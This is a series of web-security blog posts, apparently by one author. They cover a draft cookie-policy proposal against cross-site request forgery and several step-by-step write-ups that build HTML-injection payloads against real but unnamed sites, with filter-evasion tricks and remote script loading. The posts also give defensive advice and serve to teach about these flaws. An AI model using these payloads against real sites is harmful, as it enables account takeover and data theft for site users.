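function setSessionWithSos(res, sid) {
  res.setHeader('Set-Cookie', `sid=${sid}; Secure; HttpOnly`);
  res.setHeader('Content-Security-Policy', "sos-apply=sid 'self'");
}

// Minimal stand-in for a response object:
const headers = {};
const res = { setHeader: (name, value) => { headers[name] = value; } };

setSessionWithSos(res, 'abc123');
console.log(headers['Content-Security-Policy']); // sos-apply=sid 'self'
```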

Imagine a WordPress installation. The site’s owner wishes to allow anyone to visit, especially when linked from search engines, social media, and sites on other origins. In this case, they may define a policy of 'any' set by the landing page:

Content-Security-Policy: sos-apply=sid 'any'

However, the /wp-admin/ directory represents sensitive functions that should only be accessed by intention of the user. WordPress provides a robust nonce-based anti-CSRF token. Unfortunately, many plugins forget to include these nonces and therefore become vulnerable to attack. Since the site owner has set a policy for the sid cookie (which represents the session ID), they could respond to any pre-flight request for the /wp-admin/ directory as follows:

Access-Control-SOS-Reply: 'deny' expires=86400

Thus, the /wp-admin/ directory would be protected from CSRF exploits because a browser would not include the sid cookie with a forged request.

The use case for the 'isolate' policy is straightforward: the site does not expect any cross-origin requests to include cookies related to authentication or authorization. A bank or web-based email might desire this behavior. The intention of isolate is to avoid the requirement for a pre-flight request and to forbid exceptions to the policy.

== Notes ==

This is a draft. The following thoughts represent some areas that require more consideration or that convey some of the motivations behind this proposal.

This is intended to affect cross-origin requests made by a browser.

It is not intended to counter same-origin attacks such as HTML injection (XSS) or intermediation attacks such as sniffing. Attempting to solve multiple problems with this policy leads to folly.

CSRF evokes two senses of the word “forgery”: creation and counterfeiting. This approach doesn’t inhibit the creation of cross-origin requests (although something like “non-simple” XHR requests and CORS would). Nor does it inhibit the counterfeiting of requests, such as making it difficult for an attacker to guess values. It defeats CSRF by blocking a cookie that represents the user’s security context from being included in a cross-origin request the user likely didn’t intend to make.

There may be a reason to remove a policy from a cookie, in which case a CSP header could use something like an sos-remove instruction:

Content-Security-Policy: sos-remove=cookieName

Cryptographic constructs are avoided on purpose. Even if designed well, they are prone to implementation error. They must also be tracked and verified by the app, which exposes more chances for error and induces more overhead. Relying on nonces increases the difficulty of forging (as in counterfeiting) requests, whereas this proposed policy defines a clear binary of inclusion/exclusion for a cookie. A cookie will or will not be included vs. a nonce might or might not be predicted.

PRNG values are avoided on purpose, for the same reasons as cryptographic nonces. It’s worth noting that misunderstanding the difference between a random value and a cryptographically secure PRNG (which a CSRF token should favor) is another point against a PRNG-based control.

A CSP header was chosen in favor of decorating the cookie with new attributes because cookies are already ugly, clunky, and (somewhat) broken enough. Plus, the underlying goal is to protect a session or security context associated with a user. As such, there might be reason to extend this concept to the instantiation of Web Storage objects, e.g. forbid them in mixed-origin resources. However, this hasn’t really been thought through and probably adds more complexity without solving an actual problem.

The pre-flight request/response shouldn’t be a source of information leakage about cookies used by the app. At least, it shouldn’t provide more information than might be trivially obtained through other techniques.

It’s not clear what an ideal design pattern would be for deploying SOS headers. A policy could accompany each Set-Cookie header. Or the site could use a redirect or similar bottleneck to set policies from a single resource.

It would be much easier to retrofit these headers on a legacy app by using a Web App Firewall than it would be trying to modify code to include nonces everywhere.

It would be (possibly) easier to audit a site’s protection based on implementing the headers via mod_rewrite tricks or WAF rules that apply to whole groups of resources than it would for a code audit of each form and action.

The language here tilts (too much) towards formality, but the terms and usage haven’t been vetted yet to adhere to those in HTML, CSP and CORS. The goal right now is clarity of explanation; pedantry can wait.

== Cautions ==

In addition to the previous notes, these are highlighted as particular concerns.

Conflicting policies would cause confusion. For example, two different resources separately define an 'any' and 'self' for the same cookie. It would be necessary to determine which receives priority.

Cookies have the unfortunate property that they can belong to multiple origins (i.e. sub-domains). Hence, some apps might incur additional overhead of pre-flight requests or complexity in trying to distinguish cross-origin of unrelated domains and cross-origin of sub-domains.

Apps that rely on “Return To” URL parameters might not be fixed if the return URL has the CSRF exploit and the browser is now redirecting from the same origin. Maybe. This needs some investigation.

There’s no migration for old browsers: You’re secure (using a supporting browser and an adopted site) or you’re not. On the other hand, an old browser is an insecure browser anyway – browser exploits are more threatening than CSRF in many, many cases.

There’s something else I forgot to mention that I’m sure I’ll remember tomorrow.

I’ll leave you with this quote from the last episode of BSG. Thanks for reading!

Six: All of this has happened before.

Baltar: But the question remains, does all of this have to happen again?

The Resurrected Skull

It’s been seven hours and fifteen days.

No. Wait. It’s been seven years and much more than fifteen days.

But nothing compares to the relief of finishing the 4th edition of The Anti-Hacker Toolkit. The book with the skull on its cover. A few final edits need to be wrangled, but they’re minor compared to the major rewrite this project entailed.

AHT 1st Edition

The final word count comes in around 200,000. That’s slightly over twice the length of Hacking Web Apps. (Or roughly 13,000 Tweets or 200 blog posts.) Those numbers are just trivia associated with the mechanics of writing. The reward of writing is the creative process and the (eventual…) final product.

In retrospect (and through the magnifying lens of self-criticism), some of the writing in the previous edition was awful. Some of it was just inconsistent with terminology and notation. Some of it was unduly sprinkled with empty phrases or sentences that should have been more concise. Fortunately, it apparently avoided terrible cliches (all cliches are terrible, I just wanted to emphasize my distaste for them).

Many tools have been excised; others have been added. A few pleaded to remain despite their questionable relevance (I’m looking at you, wardialers). But such content was trimmed to make way for the modern era of computers without modems or floppy drives.

The previous edition had a few quaint remarks, such as a reminder to save files to a floppy disk, references to COM ports, and astonishment at file sizes that weighed in at a few dozen megabytes. The word zombie appeared three times, although none of the instances were as threatening as the one that appeared in my last book.

Over the next few weeks I’ll post more about this new edition and introduce you to its supporting web site. This will give you a flavor for what the book contains better than any book-jacket marketing dazzle.

In spite of the time dedicated to the book, I’ve added 17 new posts this year. Five of them have broken into the most-read posts since January. So, while I take some down time from writing, check out the archives for items you may have missed.

And if you enjoy reading content here, please share it! Twitter has proven to be the best mechanism for gathering eyeballs. Also, consider pre-ordering the new 4th edition or checking out my current book on web security. In any case, thanks for stopping by.

Meanwhile, I’ll be relaxing to music. I’ve put Sinéad O’Connor in the queue; it’s a beautiful piece. (And a cover of a Prince song, which reminds me to put some Purple Rain in the queue, too). Then it’s on to a long set of Sisters of Mercy, Wumpscut, Skinny Puppy, and anything else that makes it feel like every day is Halloween.

Two Hearts That Beat As One

A common theme among injection attacks that manifest within a JavaScript context (e.g. <script> tags) is that proper payloads preserve proper syntax. We’ve belabored the point of this dark art with such dolorous repetition that even Professor Umbridge might approve.

We’ve covered the most basic of HTML injection exploits, exploits that need some tweaking to bypass weak filters, and different ways of constructing payloads to preserve their surrounding syntax. The typical process is choose a parameter (or a cookie!), find if and where its value shows up in a page, hack the page. It’s a single-minded purpose against a single injection vector.

Until now.

It’s possible to maintain this single-minded purpose, but to do so while focusing on two variables. This is an elusive beast of HTML injection in which an app reflects more than one parameter within the same page. It gives us more flexibility in the payloads, which sometimes helps evade certain kinds of patterns used in input filters or web app firewall rules.

This example targets two URL parameters used as arguments to a function that expects the start and end of a time period. Forget time, we’d like to start an attack and end with its success.

Here’s a version of the link with numeric arguments, reduced to its query string:

?start=1&end=2

The app uses these values inside a <script> block, as follows:

<script>
var start = 1, end = 2;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

The “normal” attack is simple:

?start=alert(9);//&end=2

This results in a successful alert(), but the app has some sort of silly check that strips the end value if it’s not greater than the start. Thus, you can’t have start=2&end=1. And the comparison always fails if you use a string for start, because end will never be greater than whatever the string is cast to (likely zero). At least the devs remembered to enforce numeric consistency in spite of security deficiency.

<script>
var start = alert(9);//, end = ;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

But that’s inelegant compared with the attention to detail we’ve been advocating for exploit creation. The app won’t assign a value to end, thereby leaving us with a syntax error. To compound the issue, the developers have messed up their own code, leaving the browser to complain:

ReferenceError: Can't find variable: $

Let’s see what we can do to help. For starters, we’ll just assign start to end (internally, the app has likely compared a string-cast-to-number with another string-cast-to-number, both of which fail identically, which lets the payload through). Then, we’ll resolve the undefined variable for them – but only because we want a clean error console upon delivering the attack.

?start=alert(9);//&end=start;$=null

<script>
var start = alert(9);//, end = start;$=null;

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

What’s interesting about “two factor” vulns like this is the potential for using them to bypass validation filters.

?start=window["ale"/*&end=*/%2b"rt"](9)

<script>
var start = window["ale"/* end = */+"rt"](9);

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

Rather than think about different ways to pop an alert() in someone’s browser, think about what could be possible if jQuery was already loaded in the page. Thanks to JavaScript’s design, it doesn’t even hurt to pass extra arguments to a function:

?start=$["getSc"%2b"ript"](""&end=undefined)

<script>
var start = $["getSc"+"ript"]("", end = undefined);

$(JM.Scheduler.TimeZone.init(start, end));
foo.init();
</script>

And if it’s necessary to further obfuscate the payload we might try this:

?start="getSc"%2b"ript"&end=$[start]%28%22//

<script> var start = "getSc"+"ript", end = $[start]("//");

$(JM.Scheduler.TimeZone.init(start, end)); foo.init(); </script>
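The evasive pieces of these payloads boil down to computed property access: "ale"+"rt" never puts the literal token alert in the URL, yet resolves to the same property. A stand-alone model (sandbox stands in for window):

```javascript
// Computed property names defeat filters that hunt for literal
// strings like "alert" or "getScript" in the query.
const calls = [];
const sandbox = { alert: (n) => { calls.push(n); } }; // stand-in for window

sandbox["ale" + "rt"](9);  // identical to sandbox.alert(9)

const name = "ale" + "rt"; // indirection via a variable, as in $[start]
sandbox[name](9);

console.log(calls.join(',')); // 9,9
```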

Maybe combining two parameters into one attack reminds you of the theme of two hearts from 80s music. Possibly U2’s War from 1983. I never said I wasn’t gonna tell nobody about a hack like this, just like that Stacey Q song a few years later – two of hearts, two hearts that beat as one. Or Phil Collins’ Two Hearts three years after that.

Although, if you forced me to choose between two hearts that beat as one, I’d choose a Timelord, of course. In particular, someone that preceded all that music: Tom Baker. Jelly Baby, anyone?

Tom Baker

A True XSS That Needs To Be False


It is on occasion necessary to persuade a developer that an HTML injection vuln capitulates to exploitation notwithstanding the presence within of a redirect that conducts the browser away from the exploit’s embodied alert(). Sometimes, parsing an expression takes more effort than breaking it.

So, redirect your attention from defeat to the few minutes of creativity required to adjust an unproven injection into a working one. Here’s the URL we start with, reduced to its query string:

?id="onmouseover=alert(9);a="

The page reflects the value of this id parameter within an href attribute. There’s nothing remarkable about this payload or how it appears in the page. At least, not at first:

<a href="mailto:[email protected]?subject=error ref: "onmouseover=alert(9);a="">
[email protected]

Yet the browser goes into an infinite redirect loop without ever launching the alert. We explore the page a bit more to discover some anti-framing JavaScript where our URL shows up. (Bizarrely, the anti-framing JavaScript shows up almost 300 lines into the <body> element – well after several other JavaScript functions and page content. It should have been present in the <head>. It’s like the developers knew they should do something about clickjacking, heard about a top.location trick, and decided to randomly sprinkle some code in the page. It would have been simpler and more secure to add an X-Frame-Options header.)

<script type="text/javascript">
if ( != '"onmouseover=alert(9);a="') { = '"onmouseover=alert(9);a="';

The URL in your browser bar may look exactly like the URL in the inequality test. However, the location.href property contains the URL-encoded (a.k.a. percent-encoded) version of the string, which causes the condition to resolve to true, which in turn causes the browser to redirect to the new location.href. As such, the following two strings are not identical:

%22onmouseover=alert(9);a=%22
"onmouseover=alert(9);a="
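The mismatch is easy to demonstrate. In this sketch, encodeURI models the normalization applied to location.href (browsers’ exact encoding rules differ in details, but quotation marks are percent-encoded as %22):

```javascript
// The raw payload vs. what location.href reports: the percent-encoded
// quotes guarantee the string comparison fails, so the page redirects.
const raw = '"onmouseover=alert(9);a="';
const asHref = encodeURI(raw); // '"' is not a URI character, so it's escaped

console.log(asHref);         // %22onmouseover=alert(9);a=%22
console.log(asHref !== raw); // true -> the if() condition keeps redirecting
```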

Since the anti-framing triggers before the browser encounters the affected href, the onmouseover payload (or any other payload inserted in the tag) won’t trigger.

This isn’t a problem. Just redirect your onhack event from the href to the if statement. This step requires a little bit of creativity because we’d like the conditional to ultimately resolve false to prevent the browser from being redirected; an endless redirect would make the exploit more obvious.

JavaScript syntax provides dozens of options for modifying this statement. We’ll choose concatenation to execute the alert() and a Boolean operator to force a false outcome.

The new payload closes the string literal and continues the expression: '+alert(9)&&null=='


Which results in this:

<script type="text/javascript">
if ( != ''+alert(9)&&null=='') { = ''+alert(9)&&null=='';

Note that we could have used other operators to glue the alert() to its preceding string. Any arithmetic operator would have worked.
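The behavior of the injected expression can be verified outside a browser (fakeAlert stands in for alert; like alert, it returns undefined):

```javascript
// '' + fakeAlert(9) runs the function for its side effect and yields
// the string "undefined" (truthy); X && (null == '') then evaluates
// null == '', which is false -> no redirect.
let fired = null;
const fakeAlert = (n) => { fired = n; };

const result = '' + fakeAlert(9) && null == '';

console.log(fired);  // 9     (the alert fired)
console.log(result); // false (the conditional stays false)
```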

We used innocuous characters to make the statement false. Ampersands and equal signs are familiar characters within URLs. But we could have tried any number of alternates – any expression that triggers the alert() yet evaluates to false would do. Perhaps the presence of “null” might flag the URL as a SQL injection attempt, and we wouldn’t want to be defeated by a lucky WAF rule.
This example demonstrated yet another reason to pay attention to the details of an HTML injection vuln. The page reflected a URL parameter in two locations with different execution contexts. From the attacker’s perspective, we’d have to resort to intrinsic events or injecting new tags (e.g. <script>) after the href, but the if statement drops us right into a JavaScript context. From the defender’s perspective, we should have at the very least used an appropriate encoding on the string before writing it to the page – URL encoding would have been a logical step.

A Hidden Benefit of HTML5

Try parsing a web page some time. If you’re lucky, it’ll be “correct” HTML without too many typos. You might get away with using some regexes to accomplish this task, but be prepared for complex elements and attributes. And good luck dealing with code inside <script> tags.

Sometimes there’s a long journey between seeing the potential for HTML injection in a few reflected characters and crafting a successful exploit that works around validation filters and avoids being defeated by output encoding schemes. Sometimes it’s necessary to wander the dusty passages of parsing rules in search of a hidden door that opens an element to being exploited.


HTML is messy. The history of HTML even more so. Browsers struggled for two decades with badly written markup, typos, quirks, mis-nested tags, and misguided solutions like XHTML. And they’ve always struggled with sites that are vulnerable to HTML injection.

And every so often, it’s the hackers who struggle with getting an HTML injection attack to work. Here’s a common scenario in which some part of a URL is reflected within the value of a hidden input field. In the following example, note that the quotation mark has not been filtered or encoded:

?sortOn=x"

<input type="hidden" name="sortOn" value="x"">

If the site doesn’t strip or encode angle brackets, then it’s trivial to craft an exploit. In the next example we’ve even tried to be careful about avoiding dangling brackets by including a <z" sequence to consume it. A <z> tag with an empty attribute is harmless.

?sortOn=x"><script>alert(9)</script><z"

<input type="hidden" name="sortOn" value="x"><script>alert(9)</script><z"">

Now, let’s make this scenario trickier by forbidding angle brackets. If this were another type of input field, we’d resort to intrinsic events.

<input type="hidden" name="sortOn" value="x"onmouseover=alert(9)//">

Or, taking advantage of new HTML5 events, we’d use the onfocus event to execute the JavaScript rather than wait for a mouseover.

<input type="hidden" name="sortOn" value="x"autofocus/onfocus=alert(9)//">

The catch here is that the hidden input type doesn’t receive those events and therefore won’t trigger the alert. But it’s not yet time to give up. We could work on a theory that changing the input type would enable the field to receive these events.

<input type="hidden" name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//">

But modern browsers won’t fall for this. And we have HTML5 to thank for it. Section 8 of the spec codifies the HTML syntax for all browsers that wish to parse it. From the spec, Attributes:

“There must never be two or more attributes on the same start tag whose names are an ASCII case-insensitive match for each other.”

Okay, we have a constraint, but a constraint alone doesn’t tell a browser how to handle the error condition of a repeated attribute name. Ambiguity leads to security problems; it’s to be avoided at all costs. Fortunately, the spec does give instructions.

From the spec, Attribute name state:

“When the user agent leaves the attribute name state (and before emitting the tag token, if appropriate), the complete attribute’s name must be compared to the other attributes on the same token; if there is already an attribute on the token with the exact same name, then this is a parse error and the new attribute must be dropped, along with the value that gets associated with it (if any).”

So, we’ll never be able to fool a browser by “casting” the input field to a different type by a subsequent attribute. Well, almost never. Notice the subtle qualifier: subsequent.

(The messy history of HTML continues unabated by the optimism of a version number. The HTML Living Standard defines its own parsing rules in section 12. It remains to be seen how browsers handle the interplay between HTML5 and the Living Standard, and whether they avoid the conflicting implementations that led to quirks of the past.)

Think back to our injection example. Imagine the order of attributes were different for the vulnerable input tag, with the name and value appearing before the type. In this case our “type cast” succeeds because the first type attribute is the one we’ve injected.

<input name="sortOn" value="x"type="text"autofocus/onfocus=alert(9)//" type="hidden" >
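The duplicate-attribute rule can be condensed into a small sketch. This is plain JavaScript for illustration only, not the browser’s actual tokenizer, but it shows why attribute order decides the outcome of the “type cast”:

```javascript
// Minimal sketch of the HTML5 duplicate-attribute rule (not the real tokenizer):
// a repeated attribute name is a parse error and the later occurrence is dropped,
// so only the FIRST attribute of a given name in a start tag wins.
function parseAttributes(pairs) {
  const attrs = Object.create(null);
  for (const [name, value] of pairs) {
    const key = name.toLowerCase();   // names match ASCII case-insensitively
    if (key in attrs) continue;       // duplicate: drop it, the first one wins
    attrs[key] = value;
  }
  return attrs;
}

// Original attribute order: the injected type="text" duplicate is dropped.
console.log(parseAttributes([
  ['type', 'hidden'], ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['onfocus', 'alert(9)'],
]).type); // "hidden"

// Reordered markup: the injected type="text" now comes first and wins.
console.log(parseAttributes([
  ['name', 'sortOn'], ['value', 'x'],
  ['type', 'text'], ['onfocus', 'alert(9)'], ['type', 'hidden'],
]).type); // "text"
```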

HTML5 design specs only get us so far before they fall under the weight of developer errors. The HTML Syntax rules aren’t a countermeasure for HTML injection, but the presence of clear (at least compared to previous specs), standard rules shared by all browsers improves security by removing a lot of surprise from browsers’ behaviors.

Unexpected behavior hides many security flaws from careless developers. Dan Geer addresses the challenge of dealing with the unexpected in his working definition of security as “the absence of unmitigatable surprise.” Look for flaws in modern browsers where this trick still works (e.g., maybe a compatibility mode or the lack of an explicit <!doctype html> weakens the browser’s parsing algorithm). With luck, most of the problems you discover will be implementation errors to be fixed in a particular browser rather than a design change required of the spec.

HTML5 gives us a better design to help minimize parsing-based security problems. It’s up to web developers to design better sites to help maximize the security of our data.

JavaScript: A Syntax Oddity

Should you find yourself sitting in a tin can, far above the world, it’s reasonable to feel like there’s nothing you can do. Just stare out the window and remark that planet earth is blue.

Bowie Is Ticket

Should you find yourself writing a web app, with security out of this world, then it’s reasonable to feel like there’s something you forgot to do.

Here’s a web app that, at first glance, seems secure against HTML injection. However, all you have to do is tell the browser what it wants to know. Kind of like our floating Major Tom – the papers want to know whose shirts you wear.

Every countdown to an HTML injection exploit begins with a probe. Here’s a simple one:

"autofocus/onfocus=alert(9);//&search-alias=something

The site responds with a classic reflection inside an <input> field. However, it foils the attack by HTML encoding the quotation mark. After several attempts, we have to admit there’s no way to escape the quoted string:

<input type="hidden" name="url" value="&quot;autofocus/onfocus=alert(9);//&amp;search-alias=something">

Time to move on. But we’re only moving on from that particular payload. A diligent hacker pays attention to detail because, sometimes, that persistence pays off. (Regular readers might find this situation strangely familiar…)

Before we started mutating URL parameters, the link carried an innocuous node parameter whose value was 412603031.

One behavior that stood out for this page was the reflection of several URL parameters within a JavaScript block. In the original page, the JavaScript was minified and condensed to a single line. We’ll introduce the script block in a more readable composition that includes some indentation and line feeds in order to more clearly convey its semantics. The following script shows up further down the page; the key point to notice is the appearance of the number 412603031 from the node parameter:

(function(w,d,e,o){
  var i='DAaba0';
  if(w.uDA=w.ues&&w.uet&&w.uex){ues('wb',i,1);uet('bb',i)}
  siteJQ.available('search-js-general', function(){
    SPUtils.afterEvent('spATFEvent', function(){
      o=w.DA;
      if(!o){
        o=w.DA=[];
        e=d.createElement('script');
        e.src='';
        d.getElementsByTagName('head')[0].appendChild(e)
      }
      o.push({c:904,a:'site=redacted;pt=Search;pid=412603031',w:728,h:90,d:768,f:1,g:''})
    })
  })
})(window,document)

Essentially, it’s an anonymous function that takes four parameters, two of which are evidently the window and document objects since those show up in the calling arguments. If you’re having trouble conceptualizing the previous JavaScript, consider this reduced version:

(function(w,d,e,o){ var i='DAaba0'; o=w.DA;if(!o){o=w.DA=[]} o.push({c:904,a:'site=redacted;pid=XSS'}) })(window,document)

So, our goal must be to refine what gets delivered in place of the XSS characters in order to successfully execute arbitrary JavaScript.

The first step is to insert sufficient syntax to terminate the preceding tokens (e.g. function declaration, methods). This is as straightforward as counting parentheses and such. For example, the following gets us to a point where the JavaScript engine parses correctly up to the XSS.

(function(w,d,e,o){ var i='DAaba0'; o=w.DA;if(!o){o=w.DA=[]} o.push({c:904,a:'site=redacted;pid='})});XSS'}) })(window,document)

Notice in the previous example that we’ve closed the anonymous function, but there’s no need to execute it. This is the difference between (function(){})() and (function(){}) – we omitted the final () since we’re trying to avoid introducing parsing or execution errors preceding our payload.
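That distinction is easy to verify in isolation. Here’s a tiny sketch, unrelated to the target site, showing that a parenthesized function expression parses without executing until the trailing () appears:

```javascript
// A parenthesized function expression parses cleanly but never runs on its own;
// appending () turns it into an immediately invoked function expression (IIFE).
let ran = false;

(function () { ran = true });   // expression only: parsed, not executed
console.log(ran);               // false

(function () { ran = true })(); // same expression, now invoked
console.log(ran);               // true
```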

Next, we find a payload that’s appropriate for the injection context. The reflection point is already within a JavaScript execution block. Hence, there’s no need to use a payload with <script> tags or other elements, nor do we need to rely on an intrinsic event like onfocus().

The simplest payload in this case would be alert(9). However, it appears the site might be rejecting any payload with the word “alert” in it. No problem, we’ll turn to a trivial obfuscation method:

window['a'+'lert'](9)
Since we’re trying to cram several concepts into this tutorial, we’ll wrap the payload inside its own anonymous function. Incidentally, this kind of syntax has the potential to horribly confuse regular expressions with which a developer intended to match balanced parentheses.

(function(){window['a'+'lert'](9)})()
Recall that in the original site all of the JavaScript was condensed to a single line. This makes it easy for us to clean up the remaining tokens to ensure the browser doesn’t complain about any subsequent parsing errors. Otherwise, the contents of the JavaScript block may not be executed. Therefore, we’ll try throwing in an opening comment delimiter, like this:

'})});(function(){window['a'+'lert'](9)})()/*
Oops. The payload fails. In fact, this was where one review of the vuln stopped. The payload never got so complicated as using the obfuscated alert, but it did include the trailing comment delimiter. Since the browser never executed any pop-ups, everyone gave up and called this a false positive.

Oh dear, it seems hackers can be as fallible as the developers that give us these nice vulns to chew on.

Take a look at the browser’s ever-informative error console. It tells us exactly what went wrong:

SyntaxError: Multiline comment was not closed properly

Everything following the payload falls on a single line. So, we really should have just used the single line comment delimiter:

'})});(function(){window['a'+'lert'](9)})()//
And we’re done! (For extra points, try figuring out what the syntax might need to be if the JavaScript spanned multiple lines. Hint: This all started with an anonymous function.)

Here’s the whole payload inside the URL. Make sure to encode the plus operator as %2b – otherwise it’ll be misinterpreted as a space.

'})});(function(){window['a'%2b'lert'](9)})()//&search-alias=something
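The %2b detail is worth a quick aside. The sketch below uses a hypothetical decodeQueryValue helper that mimics typical server-side query-string decoding, where a literal plus becomes a space:

```javascript
// Hypothetical helper mimicking typical server-side query-string decoding:
// a literal "+" becomes a space, while %2b decodes to a real plus sign.
function decodeQueryValue(v) {
  return decodeURIComponent(v.replace(/\+/g, ' '));
}

console.log(decodeQueryValue("window['a'+'lert'](9)"));   // window['a' 'lert'](9) – broken
console.log(decodeQueryValue("window['a'%2b'lert'](9)")); // window['a'+'lert'](9) – intact
```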

And here’s the result within the script block. (WordPress’ syntax highlighting displays it accurately, which is another hint that we’ve modified the JavaScript context correctly.)

(function(w,d,e,o){ var i='DAaba0'; o=w.DA;if(!o){o=w.DA=[]} o.push({c:904,a:'site=redacted;pid='})});(function(){window['a'+'lert'](9)})()//'}) })(window,document)
There are a few points to review in this example. Here are a few hints for discovering and exploiting HTML injection:

  • Inspect the entire page for areas where a URL parameter name or value is reflected. Don’t stop at the first instance.
  • Use a payload appropriate for the reflection context. In this case, we could use raw JavaScript because the reflection appeared within a <script> element.
  • Write clean payloads. Terminate preceding tokens, comment out (or correctly open) following tokens. Pay attention to messages reported in the browser’s error console.
  • Don’t be foiled by sites that put “alert” on a deny list. Effective attacks don’t even need to use an alert() function. Know simple obfuscation techniques to bypass deny lists. (Obfuscation really just means an awareness of JavaScript’s objects, methods, semantics, and creativity.)
  • Use the JavaScript that’s already present. Most sites already have a library like jQuery loaded. Take advantage of $() to create new and exciting elements within the page.
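The deny-list hint above can be made concrete with a short sketch. The object w stands in for window here so the example runs anywhere; each line builds the name “alert” without the literal token:

```javascript
// A few equivalent ways to reach an "alert"-named method without ever writing
// the literal token "alert". The object below stands in for window in this sketch.
const w = { alert: (n) => 'alerted:' + n };

console.log(w['a' + 'lert'](9));                                // string concatenation
console.log(w[String.fromCharCode(97, 108, 101, 114, 116)](9)); // name from char codes
console.log(w['trela'.split('').reverse().join('')](9));        // name built by reversal
```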

And here are a few hints for preventing it:

  • Use an encoding mechanism appropriate to the context where data from the client will be displayed. The site correctly used HTML encoding for quotation mark (") characters within the value attribute of an <input> tag, but forgot about dealing with the same value when it was inserted into a JavaScript context.
  • Use string concatenation at your peril. Create helper functions that are harder to misuse.
  • When you find one instance of a programming mistake or a bad programming pattern, search the entire code base for other instances – it’s quicker than waiting for another exploit to appear.
  • Realize that a deny list with “alert” won’t get you anywhere. Have an idea of how diverse HTML injection payloads can be.

There’s nothing really odd about JavaScript syntax. It’s a flexible language with several ways of concatenating strings, casting types, and executing methods. We know developers can build sophisticated libraries with JavaScript. We know hackers can build sophisticated exploits with it.

We know Major Tom’s a junkie, strung out in Heaven’s high, hitting an all-time low. I have my own addiction, but the little green wheels following me are just so many HTML injection vulns, waiting to be discovered.

The Wrong Location for a Locale

Web sites that wish to appeal to broad audiences use internationalization techniques that enable content and labeling to be substituted based on a user’s language preferences without having to modify layout or functionality. A user in Canada might choose English or French, a user in Lothlórien might choose Quenya or Sindarin, and a member of the Oxford University Dramatic Society might choose to study Hamlet in the original Klingon.

Unicode and character encoding like UTF-8 were designed to enable applications to represent the written symbols for these languages. (No one creates web sites to support parseltongue because snakes can’t use keyboards and they always eat the mouse. But that still doesn’t seem fair; they’re pretty good at swipe gestures.)


A site’s written language conveys utility and worth to its visitors. A site’s programming language gives headaches and stress to its developers. Developers prefer to explain why their programming language is superior to others. Developers prefer not to explain why they always end up creating HTML injection vulnerabilities with their superior language.

Several previous posts have shown how HTML injection attacks are reflected from a URL parameter in a web page, or even how the URL fragment – which doesn’t make a round trip to the web site – isn’t exactly harmless. Sometimes the attack persists after the initial injection has been delivered, the payload having been stored somewhere for later retrieval, such as being associated with a user’s session by a tracking cookie.

And sometimes the attack exists and persists in the cookie itself.

Here’s a site that keeps a locale parameter in the URL, right where we like to test for vulns like XSS.

There’s a bunch of payloads we could start with, but the most obvious one is our faithful alert() message.

No reflection. Almost. There’s a form on this page that has a hidden _locale field whose value contains the same string as the default URL parameter:

<input type="hidden" name="_locale" value="en_US">

Sometimes developers like to use regexes or string comparisons to catch dangerous text like <script> or alert. Maybe the site has a filter that caught our payload, silently rejected it, and reverted the value to the default en_US. How inhibiting of them.

Maybe we can be smarter than a filter. After a couple of variations we come upon a new behavior that demonstrates a step forward for reflection. Throw a CRLF or two into the payload.

The catch is that some key characters in the hack have been rendered into an HTML encoded version. But we also discover that the reflection takes place in more than just the hidden form field. First, there’s an attribute for the <body>:

<body id="ex-lang-en" class="ex-tier-ABC ex-cntry-US&#034;&gt;



And the title attribute of a <span>:

<span class="ex-language-select-indicator ex-flag-US" title="US&#034;&gt;



And further down the page, as expected, in a form field. However, each reflection point killed the angle brackets and quote characters that we were relying on for a successful attack.

<input type="hidden" name="_locale" value="en_US&quot;&gt;


" id="currentLocale" />

We’ve only been paying attention to the immediate HTTP response to our attack’s request. The possibility of a persistent HTML injection vuln means we should poke around a few other pages. With a little patience, we find a “Contact Us” page that has some suspicious text. Take a look at the opening <html> tag of the following example; we seem to have messed up an xml:lang attribute so much that the payload appears twice:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
<html xmlns="" lang="en-US">


" xml:lang="en-US">


"> <head>

And something we hadn’t seen before on this site, a reflection inside a JavaScript variable near the bottom of the <body> element. (HTML authors seem to like SHOUTING their comments. Maybe we should encourage them to comment pages with things like // STOP ENABLING HTML INJECTION WITH STRING CONCATENATION. I’m sure that would work.)

<!-- Include the Reference Page Tag script -->
<script type="text/javascript"> var v = {}; v["v_locale"] = 'en_US"&gt;


'; </script>

Since a reflection point inside a <script> tag is clearly a context for JavaScript execution, we could try altering the payload to break out of the string variable:

">%0A%0D';alert(9)//

Too bad the apostrophe character (‘) remains encoded:

<script type="text/javascript"> var v = {}; v["v_locale"] = 'en_US&#034;&gt;

&#039;;alert(9)//'; </script>

That countermeasure shouldn’t stop us. This site’s developers took the time to write some vulnerable code. The least we can do is spend the effort to exploit it. Our browser didn’t execute the naked <script> block before the <head> element. What if we loaded some JavaScript from a remote resource?

As expected, the site’s response contains the HTML encoded version of the payload. We lose quotes (some of which are actually superfluous for this payload).

<body id="lang-en" class="tier-level-one cntry-US&#034;&gt;

&lt;script src=&#034;&#034;&gt;&lt;/script&gt;


But if we navigate to the “Contact Us” page we’re greeted with an alert() from the JavaScript served by our remote host.

<html xmlns="" lang="en-US">

<script src=""></script>

" xml:lang="en-US">

<script src=""></script>

"> <head>

Yé! utúvienyes! Done and exploited. But what was the complete mechanism? The GET request to the contact page didn’t contain the payload – it was just a plain link to the page.

So, the site must have persisted the payload somewhere. Check out the cookies that accompanied the request to the contact page:

Cookie: v1st=601F242A7B5ED42A; JSESSIONID=CF44DA19A31EA7F39E14BB27D4D9772F;
  sessionLocale="en_US\\"> <script src=\\"\\"></script> ";

Sometime between the request carrying the malicious locale parameter and the request to the contact page, the site decided to copy that parameter into a cookie. Then, the site took the cookie presented in the request to the contact page and wrote it into the HTML (on the server side, not via client-side JavaScript), letting the user specify a custom locale, along with any markup hiding inside it.
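A minimal sketch of that flow, with hypothetical handler names standing in for whatever the site actually runs server-side:

```javascript
// Sketch of the flow described above (hypothetical handler names).
// Request 1 copies the locale parameter into a cookie without validation;
// request 2 concatenates the cookie value into server-rendered HTML.
function setLocaleCookie(queryLocale) {
  return { sessionLocale: queryLocale };  // payload stored verbatim
}

function renderContactPage(cookies) {
  // Insecure string concatenation: markup in the cookie lands in the page.
  return '<input type="hidden" name="_locale" value="' + cookies.sessionLocale + '">';
}

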